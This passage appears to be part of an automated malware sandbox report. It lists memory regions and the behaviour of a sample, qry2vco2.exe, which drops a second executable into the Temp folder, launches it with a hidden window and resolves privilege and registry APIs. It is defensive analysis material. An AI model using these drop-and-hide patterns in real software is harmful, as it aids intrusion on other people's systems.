| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x00950fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00960000 | 0x00c96fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e430000 | 0x7e430000 | 0x7e52ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e530000 | 0x7e530000 | 0x7e552fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e557000 | 0x7e557000 | 0x7e557fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e559000 | 0x7e559000 | 0x7e55bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e55c000 | 0x7e55c000 | 0x7e55efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e55f000 | 0x7e55f000 | 0x7e55ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #231: qry2vco2.exe
177
0
| Information | Value |
|---|---|
| ID | #231 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "PDIALOG.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:47, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x14c |
| Parent PID | 0xe30 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1FC
0x
578
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00220000 | 0x002ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00817fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x01daffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 1168 |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | os_pid = 0x554, show_window = SW_HIDE |
|
1 |
Module (164)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
